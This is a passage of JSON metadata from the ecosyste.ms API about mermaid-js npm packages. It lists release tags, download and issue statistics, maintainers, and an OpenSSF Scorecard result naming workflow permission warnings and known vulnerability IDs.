https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.640Z","dependent_packages_count":0,"downloads":7,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":36.356402276885916,"dependent_packages_count":52.21209199400242,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":44.28424713544417},"purl":"pkg:npm/%40mermaid-js/flowchart-elk","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@mermaid-js/flowchart-elk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@mermaid-js/flowchart-elk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@mermaid-js/flowchart-elk/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fflowchart-elk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fflowchart-elk/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fflowchart-elk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fflowchart-elk/related_packages","maintainers":[{"uuid":"sidv","login":"sidv","name":null,"email":"npmjs@sidharth.dev","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~sidv","role":null,"created_at":"2023-11-25T05:23:13.879Z","updated_at":"2023-11-25T05:23:13.879Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sidv/packages"},{"uuid":"knsv","login":"knsv","name":null,"email":"knsv@sveido.com","url":null,"packages_count":13,"html_url":"https://www.npmjs.com/~knsv","role":null,"created_at":"2023-11-25T05:23:13.917Z","updated_at":"2023-11-25T05:23:13.917Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/knsv/packages"},{"uuid":"ugnikalnis","login":"ugnikalnis","name":null,"email":"mindaugas.laganeckas@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~ugnikalnis","role":null,"created_at":"2023-11-25T05:23:13.955Z","updated_at":"2023-11-25T05:23:13.955Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ugnikalnis/packages"},{"uuid":"ashishjain0512","login":"ashishjain0512","name":null,"email":"ashishjain0512@gmail.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~ashishjain0512","role":null,"created_at":"2023-11-25T05:23:13.993Z","updated_at":"2023-11-25T05:23:13.993Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ashishjain0512/packages"},{"uuid":"p_brolin47","login":"p_brolin47","name":null,"email":"per@mermaidchart.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~p_brolin47","role":null,"created_at":"2023-11-25T05:23:13.837Z","updated_at":"2023-11-25T05:23:13.837Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/p_brolin47/packages"},{"uuid":"aloisklink","login":"aloisklink","name":null,"email":"alois@aloisklink.com","url":null,"packages_count":15,"html_url":"https://www.npmjs.com/~aloisklink","role":null,"created_at":"2023-11-25T05:23:13.795Z","updated_at":"2023-11-25T05:23:13.795Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aloisklink/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8044718,"name":"@sautejfi/mermaid","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, sequence diagrams, class diagrams, gantt charts and git graphs.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph"],"namespace":"sautejfi","versions_count":1,"first_release_published_at":"2023-08-08T07:05:24.268Z","latest_release_published_at":"2023-08-08T07:05:24.268Z","latest_release_number":"10.2.4","last_synced_at":"2025-09-01T12:55:58.398Z","created_at":"2023-08-08T08:14:20.799Z","updated_at":"2025-09-01T14:17:50.516Z","registry_url":"https://www.npmjs.com/package/@sautejfi/mermaid","install_command":"npm install @sautejfi/mermaid","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"10.2.4"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_s